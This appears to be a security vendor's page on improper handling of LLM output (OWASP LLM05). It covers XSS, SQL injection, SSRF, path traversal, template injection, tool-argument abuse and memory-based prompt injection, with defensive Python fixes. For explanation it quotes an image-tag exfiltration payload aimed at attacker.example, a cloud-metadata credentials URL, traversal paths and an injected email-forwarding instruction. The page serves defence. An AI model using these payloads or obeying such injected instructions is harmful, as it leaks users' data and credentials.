Vulnerability

Improper Output Handling in LLM Applications
detect, understand, remediate

When an application treats text produced by a large language model as already safe and uses that text in a security-sensitive context (HTML rendering, SQL query, fetched URL, shell command, file write, agent tool argument), every classical web vulnerability class re-emerges through the new entry point. OWASP ranks the class LLM05:2025 Improper Output Handling.

No credit card required. Free plan available forever.

Severity

High

CWE ID

CWE-79

OWASP Top 10

LLM05:2025 - Improper Output Handling

CVSS 3.1 Score

9.0

What is improper output handling in LLM applications?

Improper output handling is the vulnerability class where an application treats text produced by a large language model as if it were already safe, and then uses that text in a security-sensitive context. The model output is rendered as HTML, passed to a SQL query, written to a file, fetched as a URL, executed in a shell, parsed as a configuration directive, used as an argument to an agent tool, or sent to a downstream service that trusts the calling layer. Every classical web vulnerability class (XSS, SQL injection, command injection, SSRF, open redirect, path traversal, template injection) re-emerges through the new entry point. The 2025 OWASP Top 10 for Large Language Model Applications lists the class as LLM05:2025 Improper Output Handling (the same risk was ranked LLM02 Insecure Output Handling in the 2023 v1 list).

The vulnerability differs from the input-side risk covered on the prompt injection page and the data-side risk covered on the indirect prompt injection via RAG page. Prompt injection asks how an attacker can override the model. Improper output handling asks what happens after the model has answered, regardless of whether the answer is benign or attacker-shaped. Even with a perfectly aligned model, output that is not sanitised before it reaches a downstream sink is an exploit waiting on the next prompt.

For internal AppSec, product security, AI engineering, and platform teams, this is the LLM Top 10 entry that most consistently catches mature engineering programmes off guard. The application code that lives between the model call and the user (or between the model call and the database, file system, browser, or external API) is where the bug lives. The fix is uncomplicated in principle and detailed in practice: treat every byte of model output as untrusted user input and apply the existing output-encoding, parameterisation, allow-listing, and authorisation controls that the rest of the application already enforces on user data. Where the model output feeds an agent tool's arguments, the separate question of how much authority the tool registration delegated to the model in the first place is covered on the dedicated excessive agency in LLM applications page (OWASP LLM06).

Where model output crosses a trust boundary

Rendered as HTML in the browser

The application receives model text and writes it into the page through innerHTML, dangerouslySetInnerHTML, a templating engine that does not escape, a markdown renderer that allows raw HTML, or a chat UI that auto-links URLs. Any tag, script, image, iframe, or autolinked URI the model produced fires in the user's browser.

Concatenated into a SQL or NoSQL query

A summarisation, classification, or SQL-generation step returns text that the application interpolates into a query. The model can return UNION clauses, comment markers, JSON path operators, NoSQL operators, or full statements that the parser executes.

Used as a URL in a server-side fetch

An agent or RAG flow asks the model for a URL to fetch, a hostname to call, or a redirect target. Without an allow-list the application contacts attacker-controlled infrastructure or internal cloud metadata endpoints; this is the LLM expression of server-side request forgery.

Executed in a shell, container, or interpreter

Code-execution agents, data-analysis sandboxes, and notebook-runner backends pass model output to a shell or Python interpreter. Even sandboxed runners often share a network namespace, a filesystem mount, or a credential the attacker can reach through the executed code.

Written to a file or downloaded to disk

A report-generation flow writes a model-produced filename or path. The model returns ../../etc/hosts, an alternate data stream, a Windows reserved name, or a path containing null bytes; the surrounding code happily writes outside the intended directory.

Passed as an argument to an agent tool

A tool-using agent calls a registered function: send_email(to, body), update_record(id, fields), charge_card(amount, currency), invite_user(email, role). The arguments come from the model. Without schema validation, allow-listed values, and per-tool authorisation, the call executes with the model's judgement rather than the application's.

Rendered as Markdown with active content

A markdown renderer that allows raw HTML, image tags, autolinks, or click-tracking link shorteners turns benign-looking model output into a stored exfiltration channel. The image tag fetches a logging URL with the conversation context in the query string.

Inserted into a downstream system prompt or memory

Multi-turn agents store earlier model responses into long-term memory, then use that memory as part of the system prompt for later requests. An earlier output containing a smuggled instruction becomes a permanent injection for every later session that retrieves the same memory.

How it goes wrong

1. Stored XSS through a chat transcript

A user pastes a question that asks the assistant to summarise an HTML page. The model returns the summary plus an image tag pointing to attacker.example/log. The chat UI renders the summary as HTML in every viewer's browser. Conversation history, customer support transcripts, and shared agent threads all become the exfiltration channel.

2. SQL injection via a generated WHERE clause

An analytics chat asks the model to translate a natural-language question into a SQL WHERE clause. The model emits the clause as a string. The query engine concatenates it into a SELECT statement. A crafted question produces a clause containing a UNION, a comment-out, or a sub-select that returns data the user is not authorised to read.

3. Server-side request forgery in an autonomous agent

A research agent asks the model which URL to fetch next. The model returns http://169.254.169.254/latest/meta-data/iam/security-credentials/ to satisfy the prompt. The fetcher pulls instance credentials and returns them as the next document the model summarises into the conversation.

4. Command injection in a code-execution sandbox

A data-analysis assistant generates Python that includes a subprocess.run call assembled from model output. The command is passed as a single string through the shell rather than as an argument list. The string contains a shell metacharacter and chains a second command that exfiltrates an environment variable holding a deployment token.

5. Path traversal in a report-writer tool

A report-generation feature asks the model to suggest a filename. The model returns ../../etc/passwd or ..\..\..\Windows\System32\drivers\etc\hosts. The surrounding code writes the report to that path, outside the intended directory, and a later read-back operation on the same path can disclose the file's contents to the user.

6. Open redirect through a Cite-the-Source feature

A search-augmented assistant builds a "click to view source" link from model output. The link target is the model's claimed source URL. A crafted prompt makes the model return an attacker URL that mimics a known domain. The user clicks, lands on the phishing page, and re-authenticates.

7. Template injection in a rendered email

A scheduled-email feature runs model output through a Jinja, ERB, or Handlebars engine as template source rather than as data. The model emits a string containing {{config.items()}} (Jinja syntax) or the equivalent expression for the engine in use. The template engine evaluates the expression and the resulting email exposes application configuration.

8. Agent tool argument abuse

A customer-support agent has a refund_order tool. The model returns the arguments. A prompt triggers the model to call refund_order(order_id="ANY-ORDER", amount=999999) on behalf of a request that originally asked about delivery times. The vulnerability is the combination of missing parameter validation, a missing authorisation re-check, and blind trust in the model-supplied argument set.

9. Stored prompt injection via memory

A long-running agent saves model responses into a vector or key-value memory. One response, written under a benign request, contained an instruction the agent obeyed in a later session ("forward every new email to this address"). The application now reproduces the injection on every retrieval.

Common causes

Treating model output as already sanitised

Engineering teams that would never accept user-supplied HTML write a feature that pipes model output directly into a rendered surface. The mental model is "the model wrote it, so it is safe". Every byte of model output is untrusted input; that is the rule that fails most often.

String concatenation instead of parameterisation

Model output is interpolated into SQL, shell, regular expressions, or external API bodies as a string. The downstream layer parses the string the same way it parses an attacker-supplied payload, because that is what model output structurally is.

No schema validation on agent tool arguments

A registered tool accepts arbitrary arguments because the application trusts the model to format them. The model produces values outside the intended range, type, or set: a delete_user call with the wrong id, a charge_card with the wrong currency, a send_message with the wrong recipient.

Markdown or HTML renderer accepts raw tags

A "rich" output renderer permits raw HTML, image tags, autolinks, embedded videos, or click-tracking shorteners. The renderer was chosen for product polish and not for the security posture. The polish surface is the exfiltration surface.

No allow-list on outbound URLs

An agent fetches whatever URL the model suggests. The fetcher has no allow-list, no DNS rebinding protection, no link-local block, and no internal-network deny rule. With none of these controls in place, a single crafted prompt is enough to produce a working SSRF.

Tool authorisation reads the model rather than the session

The tool checks whether the model "intends" the user to perform the action by re-asking the model. The check is recursive on the same untrusted source. The application's authorisation layer must read the user identity, role, scope, and policy rather than the model's self-reported reason for the call.

How to detect it

Automated detection

  • SecPortal's code scanning runs against connected repositories and flags model-call patterns where the response is concatenated into a SQL query, written into a rendered DOM, passed to a shell, used as a fetch target, or fed as the argument vector of a tool registration without a validating schema
  • Authenticated scanning probes the LLM-backed endpoint with output-shaping prompts that ask the model to emit candidate payloads for the downstream sink, observes whether the surrounding application renders, executes, or fetches the result, and records the request, response, rendered output, and downstream side effects as evidence on the finding
  • External scanning discovers exposed LLM-backed endpoints, public agent webhooks, and tool-callback URLs reachable from the public internet that may render or execute model output without authentication
  • Continuous monitoring re-runs the output-handling probe on a defined cadence so a renderer upgrade, a model upgrade, a new tool registration, or a switched markdown library is caught against the previous baseline

Manual testing

  • Ask the model to emit a deliberately structured payload for the downstream sink: an image tag with a logging URL for HTML rendering, a UNION clause for a SQL builder, a metadata-endpoint URL for an agent fetcher, a path with traversal segments for a file writer
  • For agent tools, enumerate every registered tool and craft a prompt that asks the model to call each tool with out-of-policy arguments; record which calls fire and what the application does with the result
  • Read the rendering and post-processing layer end to end: identify every place the model output enters a sink, then build a regression probe that ships a benign canary payload through each path
  • Submit the same probe through multi-turn conversation memory, long-term agent memory, and shared transcripts to confirm whether stored output handling is in scope
  • Inspect the network log for the test session to confirm that no model-produced URL was fetched without an allow-list pass and that no DNS lookup resolves to a link-local or internal-network address

How to fix it

Treat every byte of model output as untrusted user input

This is the single rule that every other fix on this list specialises. The model is an untrusted source of strings, and each string crosses a trust boundary on its way back into the application, so the existing trust-boundary controls (output encoding, parameterisation, allow-listing, authorisation) apply.

Render LLM output through the same encoder as classical user input

For HTML rendering, route the model output through the same context-aware encoder the application uses for arbitrary user-supplied text. Pair this with the controls on the dedicated cross-site scripting and HTML injection pages: do not use innerHTML on model output, do not enable raw HTML in the markdown renderer, do not auto-link URLs without an allow-list, do not embed user-controlled image tags without a Content-Security-Policy that constrains them.
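A minimal sketch of the encoding step, assuming a Python backend that displays model output as plain text inside a chat bubble. The helper name render_chat_message and the CSS class are hypothetical. html.escape is the standard-library encoder for HTML element and quoted-attribute contexts only; JavaScript, CSS, and URL contexts need their own encoders.

```python
import html

def render_chat_message(model_output: str) -> str:
    """Return an HTML fragment that displays model output as inert text."""
    # html.escape converts &, <, > and (with quote=True) " and ' to entities,
    # so any tag the model produced is displayed rather than parsed.
    escaped = html.escape(model_output, quote=True)
    return f'<p class="chat-message">{escaped}</p>'

# A response that carries an exfiltration image tag alongside the summary.
payload = 'Summary done. <img src="https://attacker.example/log?c=secret">'
print(render_chat_message(payload))
```

The same function is the one that should already be handling user-supplied text; the point is that model output takes the identical path rather than a separate, more trusting one.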

Parameterise every downstream query the model contributes to

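For SQL or NoSQL clauses, accept the model output as data and pass it through the driver's parameterised binding. Refuse to interpolate the model output into the statement string. Where the model must contribute structure rather than values (a column name, an operator, a sort order), map its output onto a fixed allow-list, because identifiers cannot be bound as parameters. The same rule applies to LDAP filters, XPath expressions, GraphQL operations, and shell argument vectors.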
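A short sketch of that rule using the standard-library sqlite3 driver. The orders table, the ALLOWED_COLUMNS set, and the find_orders helper are assumptions made for illustration. The model is assumed to return a column name and a value rather than a free-form clause: the value is bound as a parameter, and the column name is checked against a fixed allow-list.

```python
import sqlite3

# Hypothetical allow-list: the only columns the model may filter on.
ALLOWED_COLUMNS = {"region", "status"}

def find_orders(conn, column: str, value: str):
    """Run a filter where the model supplies a column name and a value."""
    # The column name is only placed in the statement after it matches
    # the fixed allow-list exactly.
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"column not allowed: {column!r}")
    # The value is bound by the driver and never parsed as SQL.
    sql = f"SELECT id, region, status FROM orders WHERE {column} = ?"
    return conn.execute(sql, (value,)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, region TEXT, status TEXT)")
conn.executemany(
    "INSERT INTO orders VALUES (?, ?, ?)",
    [(1, "eu", "open"), (2, "us", "closed")],
)

print(find_orders(conn, "region", "eu"))             # one matching row
print(find_orders(conn, "region", "eu' OR '1'='1"))  # treated as a literal, no rows
```

The second call shows the injection attempt being compared as an ordinary string, which is the behaviour the binding is there to guarantee.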

Allow-list every URL, host, and protocol the model can cause a fetch to

For agents and RAG flows that fetch, hold the model output to a per-feature allow-list. Block link-local, loopback, multicast, and cloud-metadata ranges by default. Resolve hostnames once, lock the resolved IP for the lifetime of the request, and refuse redirects to non-allow-listed targets. The dedicated server-side request forgery page lists the operational pattern in full.
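The checks above can be sketched with the standard library. The ALLOWED_HOSTS set and the function names are hypothetical, and the sketch covers only the pre-flight decision: the caller still has to connect to the returned IP and re-run the check on every redirect. The resolver is injectable so the check can be exercised without network access.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical per-feature allow-list of hosts the agent may fetch from.
ALLOWED_HOSTS = {"docs.example.com", "api.example.com"}

def is_public_ip(ip_text: str) -> bool:
    """Reject loopback, link-local (incl. 169.254.169.254), private, multicast."""
    ip = ipaddress.ip_address(ip_text)
    return not (
        ip.is_loopback or ip.is_link_local or ip.is_private
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )

def check_fetch_target(url: str, resolve=socket.gethostbyname) -> str:
    """Return the pinned IP for an allowed URL, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("only https is allowed")
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not on allow-list: {host!r}")
    ip_text = resolve(host)  # resolve once; the caller connects to this IP
    if not is_public_ip(ip_text):
        raise ValueError(f"resolved to a blocked range: {ip_text}")
    return ip_text

# Stub resolver standing in for DNS so the example runs offline.
print(check_fetch_target("https://docs.example.com/guide", resolve=lambda h: "8.8.8.8"))
```

Checking the resolved address as well as the hostname matters because an allow-listed name can still be pointed at an internal address.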

Bind agent tool arguments to a strict schema and re-authorise per call

Define each tool with a JSON Schema, Pydantic model, Zod schema, or equivalent type. Reject any tool call whose arguments do not validate. Run the application's authorisation layer against the user identity for each tool call, not against the model's reasoning. For high-impact tools (write, delete, send, charge, deploy), require explicit human approval and log the approval alongside the call.
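A minimal sketch of schema validation plus per-call authorisation for the refund_order tool mentioned earlier on this page. It uses only the standard library as a stand-in for JSON Schema, Pydantic, or Zod. The Session type, its fields, and the refund limit are assumptions made for illustration.

```python
from dataclasses import dataclass
from decimal import Decimal, InvalidOperation

@dataclass(frozen=True)
class Session:
    """Hypothetical server-side session; never populated from model output."""
    user_id: str
    order_ids: frozenset
    max_refund: Decimal

def validate_refund_args(args: dict) -> tuple:
    """Strict schema: exactly two keys, each typed and range-checked."""
    if set(args) != {"order_id", "amount"}:
        raise ValueError("unexpected or missing arguments")
    order_id = args["order_id"]
    if not isinstance(order_id, str) or not order_id.isalnum():
        raise ValueError("order_id must be an alphanumeric string")
    try:
        amount = Decimal(str(args["amount"]))
    except InvalidOperation:
        raise ValueError("amount must be a number")
    if not amount.is_finite() or amount <= 0:
        raise ValueError("amount must be a positive, finite number")
    return order_id, amount

def refund_order(session: Session, args: dict) -> str:
    """Validate the model-supplied arguments, then authorise against the session."""
    order_id, amount = validate_refund_args(args)
    # Authorisation reads the session, not the model's stated reason.
    if order_id not in session.order_ids:
        raise PermissionError("order does not belong to this user")
    if amount > session.max_refund:
        raise PermissionError("amount exceeds limit; human approval required")
    return f"refund queued: {order_id} {amount}"

session = Session("u1", frozenset({"A1001"}), Decimal("100"))
print(refund_order(session, {"order_id": "A1001", "amount": 25}))
```

A call such as refund_order(session, {"order_id": "B2002", "amount": 999999}) fails the ownership check before the amount is even considered, whatever the model claimed about the request.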

Sandbox any model-driven code execution and disable network egress by default

Where the application accepts a model-produced code block to execute, run it inside a sandbox with no filesystem write outside a tempdir, no network egress except to allow-listed targets, no environment variable inheritance, and a hard timeout. The sandbox is the security boundary, not the model's good behaviour.
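A partial sketch of the runner side, assuming a POSIX host and a Python child process. The function name run_untrusted_python is hypothetical. It only narrows the environment, working directory, and run time; filesystem confinement and network egress blocking have to come from the container, VM, or OS sandbox around it, which this code does not provide.

```python
import os
import subprocess
import sys
import tempfile

def run_untrusted_python(code: str, timeout_s: float = 5.0) -> subprocess.CompletedProcess:
    """Run model-produced code in a child process with a reduced footprint."""
    with tempfile.TemporaryDirectory() as workdir:
        return subprocess.run(
            [sys.executable, "-I", "-c", code],  # argv list, so no shell parsing
            cwd=workdir,             # scratch directory, deleted afterwards
            env={},                  # parent environment variables are not passed on
            capture_output=True,
            text=True,
            timeout=timeout_s,       # raises subprocess.TimeoutExpired on overrun
        )

# Demo: a secret that exists only in the parent process.
os.environ["DEPLOY_TOKEN"] = "example-secret"
result = run_untrusted_python("import os; print(os.environ.get('DEPLOY_TOKEN'))")
print(result.stdout.strip())  # the child reports that the variable is not set
```

Passing the command as a list rather than a single shell string also removes the metacharacter-chaining path described in the command-injection scenario above.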

Refuse model-controlled filenames and paths

For report writers, document generators, and file-creating flows, accept the model output as content but generate the filename and path inside the application. Where a human-readable filename is required, sanitise it against a fixed allow-listed character set and a known root before any file system call.
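One way this could look, as a sketch. REPORT_ROOT, the .pdf extension, and the report_path helper are assumptions. The model's suggestion is reduced to an allow-listed character set and used only as a readable stem; the application supplies the directory, a unique suffix, and the extension, then confirms the result is still under the root.

```python
import re
import uuid
from pathlib import Path

REPORT_ROOT = Path("/srv/reports")  # hypothetical fixed output directory

def report_path(suggested_title: str) -> Path:
    """Build a path under REPORT_ROOT; the model never supplies path segments."""
    # Replace everything outside the allow-listed set, cap the length,
    # and trim the underscores left behind by separators and dots.
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", suggested_title)[:64].strip("_")
    if not stem:
        stem = "report"
    # The application adds the unique suffix and the extension itself.
    candidate = (REPORT_ROOT / f"{stem}-{uuid.uuid4().hex[:8]}.pdf").resolve()
    # Defence in depth: confirm the result is still inside the root.
    if REPORT_ROOT.resolve() not in candidate.parents:
        raise ValueError("path escapes report root")
    return candidate

print(report_path("../../etc/passwd"))  # stays under the report root
print(report_path("Q3 revenue summary"))
```

Because separators and dots are replaced before the path is built, the traversal segments never reach the file system call; the containment check is a second line of defence rather than the primary control.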

Constrain the markdown and HTML pipeline at configuration time

Choose a renderer that does not permit raw HTML by default. Disable image embedding, raw link insertion, click-tracking link shorteners, and embedded media for any surface that displays model output to other users. Pair the renderer choice with a Content-Security-Policy that constrains image sources, script sources, and connect sources to a known set.
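As an illustration of the policy half of that pairing, the sketch below builds a Content-Security-Policy header value in Python. The directive names are standard CSP directives; the specific source lists and the build_csp_header helper are assumptions and would need to match the origins the application actually uses.

```python
# Hypothetical policy for a page that displays model output to other users.
CSP_DIRECTIVES = {
    "default-src": ["'self'"],
    "script-src": ["'self'"],
    "img-src": ["'self'"],      # blocks image beacons to third-party hosts
    "connect-src": ["'self'"],  # blocks fetch/XHR to third-party hosts
}

def build_csp_header(directives: dict) -> tuple:
    """Serialise directives into a (header name, header value) pair."""
    value = "; ".join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )
    return ("Content-Security-Policy", value)

name, value = build_csp_header(CSP_DIRECTIVES)
print(f"{name}: {value}")
```

With img-src limited to the application's own origin, an image tag that slips past the renderer still cannot send conversation context to an external logging URL.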

Treat stored model output as a stored injection surface

Where the application keeps model output in chat transcripts, support tickets, multi-turn memory, or shared documents, apply the same canonicalisation and re-encoding pass at read time that the surrounding application applies to stored user content. A stored XSS through a model output is structurally the same as a stored XSS through a comment field.

Re-run the regression probe on every model, prompt, and renderer change

A model upgrade, a prompt change, a markdown library upgrade, or a new tool registration can re-open a closed finding. Treat improper-output-handling regression tests as a first-class CI gate alongside unit and integration tests, and keep the canary payload in the test suite where the team will see it.
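A regression gate of this kind can be sketched as a plain function that a CI test calls. The canary payloads, the render stand-in, and the find_regressions helper are all hypothetical; in a real suite the renderer argument would be the application's actual rendering path, and the substring check would be replaced by whatever signal shows the sink treated the payload as active content.

```python
import html

# Hypothetical canary payloads for the HTML rendering sink.
CANARIES = {
    "html": '<img src="https://canary.example/px.gif">',
    "script": "<script>window.canary=1</script>",
}

def render(model_output: str) -> str:
    """Stand-in for the application's real renderer under test."""
    return html.escape(model_output)

def find_regressions(renderer) -> list:
    """Return the names of canaries that survive rendering as live markup."""
    failures = []
    for name, payload in CANARIES.items():
        rendered = renderer(payload)
        if "<img" in rendered or "<script" in rendered:
            failures.append(name)
    return failures

# Encoder in place: the gate passes.
assert find_regressions(render) == []
# Raw passthrough (for example after a renderer swap): the gate fails.
assert find_regressions(lambda text: text) == ["html", "script"]
```

Keeping the payloads in the test suite means a renderer or library swap fails the build instead of silently re-opening the finding.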

What this looks like in SecPortal

Finding record with output, sink, and side effect as evidence

The finding captures the original prompt, the model response, the downstream sink that consumed the response (HTML rendering, SQL query, fetch target, shell argument, tool call, file write), and the observed side effect (script execution in the test browser, query log entry, outbound request, file write outside the intended directory). The evidence is what the engineering team needs to reproduce the attack against the same surrounding code path.

Code scanning across LLM call sites

Code scanning runs against connected GitHub, GitLab, and Bitbucket repositories. Findings surface where model output flows into a query builder, a templating engine, a subprocess call, an http client, a file system write, or an unbounded tool argument vector. The remediation lands at the call site rather than at a perimeter filter.

Authenticated scanning with output-shaping payloads

Authenticated scanning runs against the LLM-backed endpoint with a curated set of output-shaping prompts under a real session. Each probe records whether the response renders, executes, or fetches inside the surrounding application, so the finding ties to a downstream sink rather than to the model's text alone.

Continuous monitoring against renderer and model drift

Continuous monitoring re-runs the output-handling probe on the configured cadence. A model upgrade, a markdown library swap, or a new tool registration that re-opens a previously closed finding shows up against the baseline rather than waiting for the next pentest cycle.

Retest after the remediation ships

Once the fix deploys, a targeted retest replays the original payload through the new sink and records the post-fix response on the finding. The finding closes against the evidence rather than against a developer's assertion that the renderer or schema is now safe.

AI-assisted writeups with explicit honest scope

AI reports generate the writeup, the executive summary, and the developer-facing reproduction steps from the finding record. The narrative stays within the verified evidence on the finding (the prompt, the response, the sink, the observed side effect) and does not invent renderer behaviour or runtime guardrails the product does not have.

Finding overrides for documented exceptions

Where a downstream sink is a deliberate test fixture or a sanctioned internal-only surface, finding overrides record the suppression rationale, the owner, and the expiry on the finding itself. The exception lives on the operating record rather than in a parallel spreadsheet.

Compliance tracking pairs the fix to control evidence

Compliance tracking maps improper-output-handling findings to the controls that read against them (ISO 27001 A.8.28 secure coding, SOC 2 CC6.1 logical access, NIST SSDF PW.5 secure coding practices, NIST AI RMF Map and Measure, ISO/IEC 42001 AI system lifecycle). The same finding feeds the engineering ticket and the auditor evidence pack.

What SecPortal does not do

SecPortal is the operating record where improper-output-handling findings, the prompt that produced the model output, the downstream sink, and the observed side effect land alongside the rest of the security backlog. The product does not run a packaged LLM output-sanitisation library inside your application, does not operate an AI gateway that intercepts model output between provider and product, does not host a model registry, and does not maintain a managed prompt-injection or output-handling probe library that updates without your engineering team.

SecPortal does not connect to Jira, ServiceNow, Slack, SIEM, SOAR, or external ticketing systems through packaged integrations. The discipline is the engineering practice on top of the operating record: AppSec, product security, AI engineering, and platform teams write the sanitisation, parameterisation, allow-listing, and tool-argument schema in the application code itself.

Related tools and reading

Vulnerability

Prompt injection (LLM01)

The input-side risk. Prompt injection asks how the attacker overrides the model. Improper output handling asks what the application does with the answer the model produced.

Vulnerability

Indirect prompt injection via RAG

The data-side risk where the payload arrives through retrieval. Indirect injection chains into improper output handling at the rendering, query, or tool-call sink immediately after.

Vulnerability

Cross-site scripting

The classical downstream sink most LLM applications hit first. The same context-aware encoder, the same Content-Security-Policy, and the same renderer constraints apply to model output.

Vulnerability

SQL injection

Where a model returns a WHERE clause, a JSON path, or a NoSQL operator that the application interpolates into a query. Parameterisation is the fix, the same way it is for user input.

Vulnerability

Server-side request forgery

Where the agent fetches whatever URL the model proposes. The link-local, loopback, and cloud-metadata block lists and the per-feature allow-list pattern transfer directly.

Vulnerability

Command injection

Where a code-execution agent passes model output to a shell. Sandboxing, argv arrays, and egress controls are the fix, the same way they are for user-supplied command-line input.

Vulnerability

Server-side template injection

Where model output reaches a Jinja, ERB, or Handlebars renderer that evaluates expressions. The fix is to pass model output to the template as data, never as template source, and to prefer a sandboxed or logic-less engine for any surface the model can influence.

Blog

OWASP Top 10 for LLM applications explained

The full 2025 LLM Top 10 reading: LLM01 Prompt Injection, LLM05 Improper Output Handling, LLM06 Excessive Agency, LLM02 Sensitive Information Disclosure, and the rest of the list in operating context.

Vulnerability

Unbounded consumption (LLM10)

The resource dimension. Where improper output handling asks what the application does with the model's answer, unbounded consumption asks how much compute, tokens, and provider money the call was allowed to spend before the answer arrived.

Framework

NIST AI Risk Management Framework

The Map, Measure, and Manage functions read directly against the output-handling control evidence and the regression probe results the engineering programme produces.

Framework

ISO/IEC 42001 AI management system

The control objectives covering AI system lifecycle, secure development, and human oversight pair to improper-output-handling remediation evidence.

Blog

Secure code review for AI-generated code

The code-review playbook for the upstream half of the same problem: how to review generated code before it reaches the production sinks whose failure modes this page describes.

Track LLM output-handling findings end to end

SecPortal records improper-output-handling findings against the application, attaches the prompt, response, sink, and observed side effect as evidence, generates AI-assisted writeups, and tracks the fix through retest. Start for free.
